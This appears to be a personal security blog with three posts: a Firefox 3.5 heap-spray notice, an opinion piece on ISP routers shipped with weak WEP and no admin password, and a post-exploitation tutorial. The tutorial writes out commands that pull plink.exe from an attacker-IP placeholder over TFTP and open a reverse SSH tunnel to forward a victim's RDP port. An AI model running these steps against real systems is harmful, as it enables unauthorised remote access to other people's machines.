Not long ago, Firefox released version 3.5… Happy news! Unfortunately a Heap Spray Vulnerability was found not long after… not good. Here’s a small article on the subject -here-
Here’s a proof of concept exploit to see the vulnerability in action:
Fortunatly for us, Firefox has issued an update. So don’t forget to update your newly upgrade Firefox.
Nothing really technical today, just an opinion on a popular ISP in my area.
When one subscribes, they are offered the choice to receive a wireless router. As an added bonus for people that may not be able to configure the device. It either comes pre-configured, or a technician can swing by and set it up for you.
That’s about the only good thing about the service. As Bob mentioned to me not long ago, he found a few security issues that alarmed me.
For starters, the router is configured by default with WEP which can be easily cracked using air-crack. The default WEP key is actually the router’s serial number. Lastly, and this is what made me jump, there is no username & password on the router… by default! As Bob was telling me, he managed to crack a few WEP keys and enter these “secure” routers provided by one of the biggest ISPs in Canada. The router has many options, such as opening and closing ports. Redirecting traffic.. just to name a few. The worst part, it never asks for a password when saving these new settings.
Another thing that surprised me is that this router also acts as the client’s modem. So along with all the local network’s information found on the device, you can also retrieve the username and password to the customer’s internet connection.
I know for a fact, that often clients with no wireless devices receive these routers so as to setup a local network easily. What does this mean? A vulnerable network, and who knows what it may contain and who may attack it. Now knowing all of this, what would stop someone from coding a virus/worm/trojan to take advantage of this? I don’t know, I suppose its possible, I mean look at Conficker and all it did (and doing). In my opinion, ISPs giving away these unsecure devices and not taking the time to configuring them with a minimum of protection aren’t helping.
Probably, involuntarily of course, are even helping the spread of malware on the net.
An SSH tunnel encrypts traffic and access non-routable machines in a secure way.
Here’s a nice wiki explaining the subject in more depth -here-
So let’s imagine you’ve managed to receive a reserve shell from your target Windows machine. Once at the command prompt, you noticed other local ports open that were not available to you during your initial attack (How you got your reserve shell is not important).
Looking over the ports, you see port 3389 open on the system (of course other ports may be more interesting but that would be better explained with Metasploit). The exercise here is, how to gain access to this non routed port to your machine that is outside the network. The answer is a tunnel, and in our case an SSH tunnel.
First you’ll need an SSH server on your system (the attacker), an SSH client on your target. This example assumes that outgoing traffic isn’t limited or monitored. Remember this is just a simple exercise that can be easily accomplished at home on your local network.
Let’s start by getting a simple ssh client to our windows machines. There are many ways one can do this, I prefer using TFTP for 2 reasons. Firstly Windows usually comes with a TFTP client and Backtrack has a nifty TFTP server readily available. (note: one must always verify and see upload/download options)
So let’s start by uploading our ssh client “plink.exe“
C:\>TFTP -i -your IP here- GET plink.exe
There’s no progress bar, so you’ll just have to wait for your prompt to come back once the upload is finished.
Now that you have your client, lets start our ssh connection. Make sure you have your listener setup.
C:\>plink -P 22 -l root -pw root -C -R 3389:127.0.0.1:3389 -your IP here-
Real quick, the -C puts compression on the connection and the -R remotely fowards it to the local machine. The user and password should be set to your own on the ssh server.
If all went well you’ll be back to your Linux prompt. Check to see what ports are now listening on your local machine, and you should see 3389 now.
Start up rdesktop and point it to 127.0.0.1 on port 3389 and you’ll be rewarded with a nice remote desktop.One could use this method on other ports for other means.
As mentioned above, you can remotely forward other ports and run other applications. Imagine forwarding port 139 to your local machine.
Please remember to do this on your local network, as this implies that you port scanned your victim machine. Port scanning is considered illegal in certain parts of the world.